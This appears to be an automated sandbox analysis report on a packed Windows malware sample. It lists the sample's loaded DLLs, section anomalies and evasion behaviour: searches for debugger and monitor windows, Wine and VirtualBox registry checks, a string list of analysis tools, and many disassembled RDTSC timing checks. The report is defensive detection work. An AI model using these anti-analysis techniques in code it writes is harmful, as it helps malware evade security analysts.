Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002D29FF
Source: C:\Users\user\Desktop\r8nllkNEQX.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\r8nllkNEQX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: r8nllkNEQX.exeReversingLabs: Detection: 55%
Source: r8nllkNEQX.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: r8nllkNEQX.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeSection loaded: kernel.appcore.dllJump to behavior
Source: r8nllkNEQX.exeStatic file information: File size 4509696 > 1048576
Source: r8nllkNEQX.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: r8nllkNEQX.exeStatic PE information: Raw size of vnoaippe is bigger than: 0x100000 < 0x1c0400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\r8nllkNEQX.exeUnpacked PE file: 0.2.r8nllkNEQX.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vnoaippe:EW;ernybvwg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vnoaippe:EW;ernybvwg:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: r8nllkNEQX.exeStatic PE information: real checksum: 0x451cba should be: 0x453b43
Source: r8nllkNEQX.exeStatic PE information: section name:
Source: r8nllkNEQX.exeStatic PE information: section name: .idata
Source: r8nllkNEQX.exeStatic PE information: section name:
Source: r8nllkNEQX.exeStatic PE information: section name: vnoaippe
Source: r8nllkNEQX.exeStatic PE information: section name: ernybvwg
Source: r8nllkNEQX.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_006541D0 push eax; mov dword ptr [esp], edx0_2_006541D5
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00352340 push eax; mov dword ptr [esp], 00000000h0_2_00352343
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0038C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0038C743
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0032E92D push es; retf 0_2_0032E92E
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00310AC0 push eax; mov dword ptr [esp], 00000000h0_2_00310AC4
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00331430 push eax; mov dword ptr [esp], 00000000h0_2_00331433
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_003539A0 push eax; mov dword ptr [esp], 00000000h0_2_003539A3
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0032DAD0 push eax; mov dword ptr [esp], edx0_2_0032DAD1
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00659F40 push dword ptr [eax+04h]; ret 0_2_00659F6F
Source: r8nllkNEQX.exeStatic PE information: section name: vnoaippe entropy: 7.955338665560642

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\r8nllkNEQX.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: A20AC9 second address: A20ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: A20ACD second address: A20AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: A20AD7 second address: A20ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA03DE second address: BA03E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B8CB87 second address: B8CB9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B8CB9A second address: B8CB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B8CB9E second address: B8CBCF instructions: 0x00000000 rdtsc 0x00000002 js 00007FFB28B74666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007FFB28B74668h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jnl 00007FFB28B7466Ch 0x0000001b jmp 00007FFB28B7466Dh 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9F886 second address: B9F89D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A0Dh 0x00000009 jl 00007FFB28DE2A06h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9F89D second address: B9F8A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA15EE second address: A20AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 xor dword ptr [esp], 592852A9h 0x0000000e jmp 00007FFB28DE2A10h 0x00000013 push dword ptr [ebp+12A311D5h] 0x00000019 mov dword ptr [ebp+12A3384Dh], eax 0x0000001f and cl, FFFFFFF4h 0x00000022 call dword ptr [ebp+12A31D0Ah] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+12A31971h], eax 0x0000002f xor eax, eax 0x00000031 jmp 00007FFB28DE2A0Eh 0x00000036 sub dword ptr [ebp+12A31971h], edi 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 sub dword ptr [ebp+12A31971h], ebx 0x00000046 mov dword ptr [ebp+12A32AD5h], eax 0x0000004c pushad 0x0000004d or ecx, dword ptr [ebp+12A32B21h] 0x00000053 sub ecx, dword ptr [ebp+12A32C19h] 0x00000059 popad 0x0000005a mov esi, 0000003Ch 0x0000005f jmp 00007FFB28DE2A14h 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jmp 00007FFB28DE2A15h 0x0000006d lodsw 0x0000006f cmc 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jmp 00007FFB28DE2A0Fh 0x00000079 mov dword ptr [ebp+12A31971h], ebx 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 pushad 0x00000084 mov ebx, dword ptr [ebp+12A32C3Dh] 0x0000008a adc edi, 7DC0B4F0h 0x00000090 popad 0x00000091 nop 0x00000092 push ebx 0x00000093 jg 00007FFB28DE2A12h 0x00000099 pop ebx 0x0000009a push eax 0x0000009b pushad 0x0000009c push eax 0x0000009d push edx 0x0000009e pushad 0x0000009f popad 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA16BB second address: BA16C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA1889 second address: BA188D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA188D second address: BA1896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA18F8 second address: BA1919 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A19h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA1919 second address: BA191D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA191D second address: BA19A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FFB28DE2A17h 0x0000000f push 00000000h 0x00000011 jmp 00007FFB28DE2A19h 0x00000016 push 0B307F06h 0x0000001b jnp 00007FFB28DE2A12h 0x00000021 jno 00007FFB28DE2A0Ch 0x00000027 xor dword ptr [esp], 0B307F86h 0x0000002e mov edx, ecx 0x00000030 push 00000003h 0x00000032 add edx, 568545CAh 0x00000038 push 00000000h 0x0000003a mov ecx, dword ptr [ebp+12A32D99h] 0x00000040 jp 00007FFB28DE2A0Ch 0x00000046 push 00000003h 0x00000048 mov edi, ebx 0x0000004a push 550A217Eh 0x0000004f push eax 0x00000050 push edx 0x00000051 jnc 00007FFB28DE2A08h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BA19A8 second address: BA19F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 6AF5DE82h 0x00000010 call 00007FFB28B74677h 0x00000015 pop edx 0x00000016 lea ebx, dword ptr [ebp+12BB4560h] 0x0000001c sub dword ptr [ebp+12A31BBEh], edx 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FFB28B7466Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1378 second address: BC1384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FFB28DE2A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1384 second address: BC139F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFB28B74675h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC139F second address: BC13A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC13A3 second address: BC13C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28B74676h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC14FE second address: BC1504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1504 second address: BC151B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28B74672h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC16B9 second address: BC16C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC17E6 second address: BC17EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC17EC second address: BC1817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FFB28DE2A0Eh 0x0000000b jmp 00007FFB28DE2A15h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1957 second address: BC1960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1AC1 second address: BC1AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FFB28DE2A16h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1F02 second address: BC1F31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74678h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FFB28B74666h 0x00000011 jmp 00007FFB28B7466Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1F31 second address: BC1F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1F35 second address: BC1F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1F3B second address: BC1F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 js 00007FFB28DE2A06h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFB28DE2A16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC1F62 second address: BC1F67 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC2229 second address: BC222D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BB5B16 second address: BB5B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BB5B1D second address: BB5B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BB5B23 second address: BB5B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BB5B28 second address: BB5B40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFB28DE2A0Dh 0x00000008 jno 00007FFB28DE2A06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B84479 second address: B844A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFB28B7466Ch 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFB28B74673h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC2C8A second address: BC2C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC2C90 second address: BC2CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnc 00007FFB28B7466Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jng 00007FFB28B74666h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC2E03 second address: BC2E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC2E07 second address: BC2E11 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFB28B74666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC2E11 second address: BC2E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC2E1C second address: BC2E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC2F7F second address: BC2F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC3200 second address: BC3204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC5755 second address: BC575B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC575B second address: BC575F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC575F second address: BC5763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC5763 second address: BC5771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC4962 second address: BC4968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC4968 second address: BC496D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC496D second address: BC497B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC497B second address: BC4983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC8610 second address: BC861C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFB28DE2A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BC861C second address: BC8631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FFB28B7466Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCD8E1 second address: BCD8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCCF25 second address: BCCF2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BCCF2A second address: BCCF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28DE2A0Fh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
